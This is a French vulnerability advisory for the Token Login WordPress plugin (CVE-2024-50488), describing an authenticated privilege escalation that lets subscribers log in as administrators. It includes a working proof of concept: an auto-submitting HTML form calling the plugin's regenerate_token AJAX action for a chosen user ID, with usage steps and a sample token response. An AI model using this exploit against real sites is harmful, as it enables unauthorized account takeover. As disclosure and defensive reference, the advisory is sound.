
Token Login <= 1.0.3 - Élévation de privilèges par un utilisateur authentifié (Subscriber+)
Token Login <= 1.0.3 - Élévation de privilèges authentifiée (Abonné+)
Le plugin WordPress de connexion automatique via une URL sécurisée avec jeton, avec restriction de connexion par rôle, est vulnérable à une élévation de privilèges par prise de contrôle de compte dans toutes les versions jusqu'à la 1.0.3 incluse. Cela est dû au fait que le plugin ne vérifie pas correctement si un utilisateur dispose des permissions nécessaires pour générer un jeton de connexion pour d'autres utilisateurs. Cela permet à des attaquants authentifiés, ayant au moins un accès de niveau abonné, de se connecter en tant qu'autres utilisateurs, y compris les administrateurs.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login
Connecté, exécutez cette soumission HTML. Remplacez l'URL par celle du site WordPress sur lequel vous êtes connecté. Remplacez l'ID par celui de l'utilisateur pour lequel vous souhaitez générer le jeton. Copiez l'URL et vous pourrez vous connecter comme cet utilisateur.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Réponse
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}